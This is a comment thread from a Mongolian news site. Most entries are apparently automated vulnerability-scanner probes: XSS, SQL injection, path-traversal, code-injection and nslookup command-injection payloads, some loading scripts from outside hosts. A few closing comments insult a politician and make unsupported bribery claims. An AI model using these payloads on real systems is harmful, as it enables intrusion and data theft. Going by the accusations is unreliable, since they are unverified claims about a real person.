GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9744'>] 2020-10-28 15:19:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:17

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1' OR 2+388-388-1=0+0+0+1 or '1H5heLs2'=' [116.113.93.82] 2020-10-28 15:19:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:15

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=ExlD(9164)>] 2020-10-28 15:19:15

1

-1' OR 2+769-769-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 15:19:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:14

../../../../../../../../../../etc/passwd.jpg

-1 OR 2+424-424-1=0+0+0+1 [116.113.93.82] 2020-10-28 15:19:13

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 15:19:13

1

-1 OR 2+309-309-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 15:19:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:11

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

NBs6n9ss [116.113.93.82] 2020-10-28 15:19:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:10

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:08

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82<video><source onerror="javascript:ExlD(9639)">] 2020-10-28 15:19:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:03

1

GRLpGpAG [116.113.93.82<ScRiPt >ExlD(9883)</ScRiPt>] 2020-10-28 15:19:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:02

4pqsfywx'));select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:00

lWmfqI2C');select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:58

d9jGZS0J';select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:57

-1));select pg_sleep(3); --

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9934></ScRiPt>] 2020-10-28 15:18:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:56

-1);select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:55

-1;select pg_sleep(9); --

GRLpGpAG [116.113.93.82<ScRiPt >ExlD(9943)</ScRiPt>] 2020-10-28 15:18:53

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 15:18:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:52

-1;select pg_sleep(0); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:51

-1;select pg_sleep(3); --

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 15:18:50

1

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>ExlD(9310)</sCr<ScRiPt>IpT>] 2020-10-28 15:18:49

1

GRLpGpAG [116.113.93.82<script>ExlD(9305)</script>] 2020-10-28 15:18:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:44

nif4HAiq'; waitfor delay '0:0:9' --

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 15:18:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:42

1 waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82<WUGSGF>DAJXO[!+!]</WUGSGF>] 2020-10-28 15:18:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:41

-1); waitfor delay '0:0:9' --

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 15:18:41

1

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 15:18:40

1

[116.113.93.82] 2020-10-28 15:18:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:38

${@print(md5(acunetix_wvs_security_test))}\

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:38

-1; waitfor delay '0:0:9' --

[116.113.93.82] 2020-10-28 15:18:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:36

${@print(md5(acunetix_wvs_security_test))}

JyI= [116.113.93.82] 2020-10-28 15:18:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:35

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [116.113.93.82<ScRiPt >ExlD(9231)</ScRiPt>] 2020-10-28 15:18:34

1

@@6ZopQ [116.113.93.82] 2020-10-28 15:18:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:33

';print(md5(acunetix_wvs_security_test));$a='

1 [116.113.93.82] 2020-10-28 15:18:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:32

-1; waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:32

;print(md5(acunetix_wvs_security_test));

\ [116.113.93.82] 2020-10-28 15:18:31

1

1'" [116.113.93.82] 2020-10-28 15:18:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:26

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:25

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

GRLpGpAG [{{10000239*10000261}}] 2020-10-28 15:18:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:23

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:22

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:21

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:20

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:20

if(now()=sysdate(),sleep(9),0)

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:19

@@XTHGb

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:18

-1" OR 2+540-540-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:15

-1' OR 2+845-845-1=0+0+0+1 or 'ZNjM5AEz'='

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:15

1

GRLpGpAG [acux10961] 2020-10-28 15:18:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:13

\

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:12

-1' OR 2+920-920-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:10

-1 OR 2+163-163-1=0+0+0+1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:09

-1 OR 2+735-735-1=0+0+0+1 --

GRLpGpAG [acu5989<s1﹥s2ʺs3ʹuca5989] 2020-10-28 15:18:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:08

POZreO0n

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:07

1

GRLpGpAG [116.113.93.829121266] 2020-10-28 15:18:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:06

1

<!-- [116.113.93.82] 2020-10-28 15:18:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:03

1'"

GRLpGpAG ['"()&%<acx><ScRiPt >ExlD(9833)</ScRiPt>] 2020-10-28 15:18:03

1

'" [116.113.93.82] 2020-10-28 15:18:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:02

<!--

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 15:18:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:59

'"

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:59

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >ExlD(9148)</ScRiPt>] 2020-10-28 15:17:58

1

create/. [116.113.93.82] 2020-10-28 15:17:56

1

/www.vulnweb.com [116.113.93.82] 2020-10-28 15:17:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:55

/www.vulnweb.com

create [116.113.93.82] 2020-10-28 15:17:54

1

create [116.113.93.82] 2020-10-28 15:17:53

1

GRLpGpAG [<!--] 2020-10-28 15:17:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:52

create/.

GRLpGpAG [/www.vulnweb.com] 2020-10-28 15:17:51

1

GRLpGpAG ['"] 2020-10-28 15:17:51

1

testasp.vulnweb.com [116.113.93.82] 2020-10-28 15:17:49

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 15:17:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:48

create

GRLpGpAG [] 2020-10-28 15:17:48

1

http://hitH9ZrKiRkYi.bxss.me/ [116.113.93.82] 2020-10-28 15:17:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:47

create

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 15:17:47

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 15:17:46

1

GRLpGpAG [] 2020-10-28 15:17:46

1

GRLpGpAG [JyI=] 2020-10-28 15:17:44

1

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 15:17:44

1

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 15:17:44

1

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 15:17:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:43

http://hitWivueLh3VY.bxss.me/

GRLpGpAG [@@UBNpv] 2020-10-28 15:17:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:43

testasp.vulnweb.com/t/xss.html?%00

!(()&&!|*|*| [116.113.93.82] 2020-10-28 15:17:42

1

GRLpGpAG [1] 2020-10-28 15:17:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:41

HttP://testasp.vulnweb.com/t/xss.html?%00

) [116.113.93.82] 2020-10-28 15:17:41

1

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 15:17:41

1

GRLpGpAG [\] 2020-10-28 15:17:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:40

^(#$!@#$)(()))******

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 15:17:39

1

GRLpGpAG [1'"] 2020-10-28 15:17:39

1

GRLpGpAG [create/.] 2020-10-28 15:17:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:37

!(()&&!|*|*|

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:37

testasp.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:36

)

GRLpGpAG [create] 2020-10-28 15:17:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:36

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [http://hittl08qCQDXB.bxss.me/] 2020-10-28 15:17:36

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 15:17:36

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 15:17:36

1

GRLpGpAG [create] 2020-10-28 15:17:35

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 15:17:35

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 15:17:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:33

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:33

1

GRLpGpAG&n902371=v977486 [116.113.93.82] 2020-10-28 15:17:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:32

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [6BFsYu6G'));select pg_sleep(19); -- ] 2020-10-28 15:17:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:31

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [RDqeK1bB');select pg_sleep(19); -- ] 2020-10-28 15:17:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:30

1&n975181=v967170

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 15:17:30

1

GRLpGpAG [0OyWTBv8';select pg_sleep(19); -- ] 2020-10-28 15:17:29

1

'"() [116.113.93.82] 2020-10-28 15:17:29

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 15:17:28

1

GRLpGpAG [qhHAph0a';select pg_sleep(13); -- ] 2020-10-28 15:17:28

1

Array [116.113.93.82] 2020-10-28 15:17:28

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 15:17:28

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 15:17:27

1

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 15:17:27

1

Array [116.113.93.82] 2020-10-28 15:17:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:27

'"()

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 15:17:27

1

GRLpGpAG [)] 2020-10-28 15:17:26

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 15:17:26

1

Array [116.113.93.82] 2020-10-28 15:17:25

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 15:17:25

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 15:17:24

1

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 15:17:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:23

Array

GRLpGpAG [file:///etc/passwd] 2020-10-28 15:17:23

1

Зочин [116.113.93.82] 2020-10-28 15:17:22

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 15:17:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:20

Array

GRLpGpAG [..] 2020-10-28 15:17:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:19

Array

GRLpGpAG ['"()] 2020-10-28 15:17:19

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 15:17:18

1

GRLpGpAG [Array] 2020-10-28 15:17:18

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 15:17:17

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 15:17:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:17

12345'"\'\");|]*{ <>

NHNjd3ZONE4= [116.113.93.82] 2020-10-28 15:17:16

1

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 15:17:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:15

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 15:17:15

1

GRLpGpAG [116.113.93.82&n912677=v920368] 2020-10-28 15:17:15

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 15:17:14

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 15:17:14

1

GRLpGpAG [/etc/passwd] 2020-10-28 15:17:13

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 15:17:12

1

${9999828+9999901} [116.113.93.82] 2020-10-28 15:17:12

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 15:17:12

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 15:17:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:11

${9999040+9999736}

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 15:17:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:08

1

GRLpGpAG [${9999039+9999241}] 2020-10-28 15:17:08

1

&nslookup IjcbsX4l&'\"`0&nslookup IjcbsX4l&`' [116.113.93.82] 2020-10-28 15:17:08

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 15:17:08

1

GRLpGpAG [muMkLAgA'; waitfor delay '0:0:13' -- ] 2020-10-28 15:17:08

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 15:17:07

1

GRLpGpAG [Array] 2020-10-28 15:17:07

1

GRLpGpAG [1 waitfor delay '0:0:13' -- ] 2020-10-28 15:17:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:06

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [Array] 2020-10-28 15:17:06

1

$(nslookup oQngi39v) [116.113.93.82] 2020-10-28 15:17:06

1

GRLpGpAG [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 15:17:05

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 15:17:05

1

set|set&set [116.113.93.82] 2020-10-28 15:17:04

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(19),0))XOR"Z] 2020-10-28 15:17:04

1

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 15:17:03

1

GRLpGpAG [] 2020-10-28 15:17:03

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 15:17:03

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 15:17:03

1

"+response.write(9221904*9816909)+" [116.113.93.82] 2020-10-28 15:17:02

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 15:17:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:02

&nslookup YrBg3YFh&'\"`0&nslookup YrBg3YFh&`'

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 15:17:01

1

'+response.write(9221904*9816909)+' [116.113.93.82] 2020-10-28 15:17:01

1

GQnRGjZ9 [116.113.93.82] 2020-10-28 15:17:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:00

$(nslookup lBcNwukz)

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:58

set|set&set

response.write(9221904*9816909) [116.113.93.82] 2020-10-28 15:16:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:58

0ktau5ED

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:57

"+response.write(9828229*9603854)+"

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 15:16:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:56

'+response.write(9828229*9603854)+'

GRLpGpAG [3uoTuYLX] 2020-10-28 15:16:56

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 15:16:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:55

response.write(9828229*9603854)

GRLpGpAG [&nslookup hIrJkYU6&'\"`0&nslookup hIrJkYU6&`'] 2020-10-28 15:16:54

1

GRLpGpAG [if(now()=sysdate(),sleep(19),0)] 2020-10-28 15:16:53

1

GRLpGpAG [-1" OR 2+793-793-1=0+0+0+1 -- ] 2020-10-28 15:16:52

1

GRLpGpAG [$(nslookup 6mKeZ8vJ)] 2020-10-28 15:16:52

1

GRLpGpAG [-1' OR 2+100-100-1=0+0+0+1 or 'TPOws5vH'='] 2020-10-28 15:16:51

1

GRLpGpAG [set|set&set] 2020-10-28 15:16:50

1

GRLpGpAG [-1' OR 2+733-733-1=0+0+0+1 -- ] 2020-10-28 15:16:49

1

GRLpGpAG [-1 OR 2+931-931-1=0+0+0+1] 2020-10-28 15:16:48

1

GRLpGpAG [-1 OR 2+684-684-1=0+0+0+1 -- ] 2020-10-28 15:16:47

1

GRLpGpAG [s3MUkBlI] 2020-10-28 15:16:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:43

1

GRLpGpAG ["+response.write(9487484*9665657)+"] 2020-10-28 15:16:41

1

GRLpGpAG ['+response.write(9487484*9665657)+'] 2020-10-28 15:16:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:39

1

GRLpGpAG [response.write(9487484*9665657)] 2020-10-28 15:16:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 14:45:50

1

Зочин [202.126.89.65] 2020-10-27 20:33:20

Чи өөрөө байгал дэлхий онгочиж дуусгаж байж одоо төрөөс бас юу нэхээд байнаа

ард түмэн [103.26.193.110] 2020-10-27 13:51:18

шоронд бх ёстой өвгөн дөө энэ шуналт новш

ард түмэн [103.26.193.110] 2020-10-27 13:49:25

өвгөн та нүүрсний хулгайгаа яагаад ярихгүй бгам бэээ

Бб [202.55.188.102] 2020-10-27 07:20:15

Элбэгдоржид сонгуулийн өмнө 3 тэрбум төгрөг хахуульд өгсөн АТГ шалгаарай. Эба нь энэ мудакд чи сонгуулиар 500 саяыг гарга сонгогдвол нэг 0 нэмээд 5 тэрбум болгоод авна гэж хэлж бсан. Овоо луйварчид бгаабиз

зочин [66.181.167.53] 2020-10-27 06:00:12

Чи байгаль эхийг сүйтгэж байгаа биз дээ , Нөхөн сэргээлтээ сайн хий л дээ өөрөө

Чч [202.55.188.102] 2020-10-27 05:08:29

Энэ хэлгүй мудак хэл ороо юу. Канделиараа . Жинхэнэ хулгайч сэтгэлгээтэй оркдоо. Хөдөөний

АН [103.229.122.161] 2020-10-27 04:28:33

Усыг нь чи ширгээсэн биздээ гөлөг минь


1486 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
1486 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.